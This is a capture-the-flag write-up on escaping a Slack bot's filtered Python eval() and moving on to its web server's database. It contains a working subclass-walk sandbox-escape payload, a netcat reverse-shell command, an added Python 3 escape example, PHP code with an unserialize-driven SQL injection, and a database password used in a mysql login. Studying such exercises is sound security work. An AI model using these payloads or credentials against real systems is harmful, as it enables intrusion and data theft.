The organizers manually invited competitors to the hidebot.slack.com Slack workspace. They said I could use hidebot and hidebot2~7 for queries. Use of the bot on public channels was prohibited by the organizers.
To check the bot's functionality, they said to use the @hidesbot help command.
idk:
@hidesbot3 help
hidesbot3:
[*] Command list
- notice num
- 99dan num
- lolstat nick
- lol_notice
Currently, lolstat/lol_notice is not available.
Please use the website(http://52.175.145.142/lol/)
The website didn't seem to have any visible vulnerabilities.
The notice command only accepts a number between 0 and 12. lolstat does not work. lol_notice works the same as the notice command. The 99dan command's result is interesting.
request:response
1:1*1=1~1*9*9
1a:error
(1):empty
(1+1):empty
(1+1a):error
I suspected the input was being evaluated by a language interpreter. First I assumed it was Python.
__import__('os').system('ls'):no hack
?! no hack?
'\x39':empty
0x9:empty
int('9'):empty
int("9"):empty
int('9')z:error
Now I was sure it was Python.
open('/etc/passwd'):empty
open('./flag'):error
Aww.. no flag. And there were some filters.
sys:no hack
__import__:no hack
I tried a traditional Python sandbox-escape payload from CTFs.
@hidesbot3 99dan [].__class__.__base__.__subclasses__()[59].__init__
(empty)
@hidesbot3 99dan [].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache']
(empty)
...
@hidesbot3 99dan [].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__.values()[12].popen('busybox nc <my ip> <my port> -e sh')
?! Shell achieved! The website's source code was there as a backup zip archive (b4ckup4u.zip). The database connection information is redacted.
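The payload above works because every Python function object carries its module's globals, so walking object's subclass list reaches a module namespace (the page's used linecache, which imports os) without ever typing a blocked name. The page's payload uses Python 2 names (func_globals, a list-valued dict.values()); the example below, added here and not part of the writeup or the bot, does the same walk under Python 3 names. The denylist in sandbox_eval is an assumption modelled on the "no hack" replies recorded for sys and __import__ (the bot's source is never shown), and the walk assumes the os module has already been imported in the process, as it is in a normal CPython start-up.

```python
"""Added example (not the bot's code): a filtered eval() and the subclass walk
that escapes it under Python 3."""

# Assumed denylist, constructed for this example from the page's "no hack" replies.
BLOCKED = ("__import__", "sys")


def sandbox_eval(expr: str) -> str:
    """Model of the 99dan handler: refuse blocked substrings, otherwise eval() the text.
    Any exception is collapsed to 'error', as the bot appears to do."""
    if any(bad in expr for bad in BLOCKED):
        return "no hack"
    try:
        return str(eval(expr))
    except Exception:
        return "error"


def find_os_namespace():
    """Walk object's direct subclasses and return the globals dict of a class whose
    __init__ was defined inside the os module (os._wrap_close in CPython 3).
    Slot-wrapper __init__ methods have no __globals__ and are skipped.
    No import and no reference to sys is needed: the dict is reached through a
    function object that already exists in memory."""
    for cls in ().__class__.__base__.__subclasses__():
        try:
            glb = getattr(cls.__init__, "__globals__", None)
        except Exception:
            continue
        if glb and "popen" in glb and "environ" in glb:
            return glb
    return None


# The same walk as a single expression, i.e. what would be sent as the 99dan argument.
# It avoids the substrings "sys" and "__import__" entirely.
PAYLOAD = (
    "next(getattr(c.__init__, '__globals__', {})['popen']"
    " for c in ().__class__.__base__.__subclasses__()"
    " if 'popen' in getattr(c.__init__, '__globals__', {})"
    " and 'environ' in getattr(c.__init__, '__globals__', {}))"
    "('echo escaped').read()"
)


if __name__ == "__main__":
    print(sandbox_eval("__import__('os').system('ls')"))  # filtered
    print(sandbox_eval(PAYLOAD))  # runs the command anyway
```

The page's payload hard-codes the subclass index (59) and a dict.values() offset (12); both depend on the exact interpreter build, which is why a scan like the one above is preferable when the target version is unknown. A substring denylist on an eval() sink cannot close this path: the attribute chain uses only names that any expression is allowed to contain.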
config.php:
<?php
$hostname = "localhost";
$user = "########";
$password = "########";
$dbname = "########";
$q = mysql_connect($hostname, $user, $password) or die("db error");
mysql_select_db($dbname, $q) or die("db error2");
?>
There was an unserialize vulnerability, and there seems to be an intended MySQL query function.
read.php:
<?php
include "config.php";
include "uclass.php";
$article_no = mysql_real_escape_string($_POST['no']);
$id = mysql_real_escape_string($_POST['uid']);
$pw = mysql_real_escape_string($_POST['upw']);
if(isset($_COOKIE['u']) && isset($article_no)){
    // attacker-controlled: the cookie is base64-decoded and unserialized as-is
    $obj = unserialize(base64_decode($_COOKIE['u']));
    ob_start();
    echo $obj->r();
...
uclass.php:
<?php
include "config.php";
class Go
{
    // private, but unserialize() restores private properties too,
    // so a forged cookie can set $t to any table name (or any SQL)
    private $t = "board";
    public function r()
    {
        // $t is interpolated into the query unescaped
        $q = "SELECT * FROM {$this->t} WHERE 1";
        $r = mysql_query($q) or die(mysql_error());
        $row = mysql_fetch_row($r);
        $arr = json_encode(array('subject'=>$row[1], 'content'=>$row[3]));
        return $arr;
    }
    public function b()
    {
        $q = "SELECT * FROM {$this->t}";
        $r = mysql_query($q) or die(mysql_error());
        $row = mysql_fetch_row($r);
    }
}
?>
I could have used the class to query the database, but I had a shell and there was a mysql client binary. There was also a config.php in /var/www/html.
So I ran these commands:
mysql -uhidebot -p'lolbot!@#' lol
SHOW TABLES;
(pressed Ctrl+D)
Tables_in_lol
santa
board
mysql -uhidebot -p'lolbot!@#' lol
SELECT * FROM santa;
(pressed Ctrl+D)
<flag>
I forgot the flag.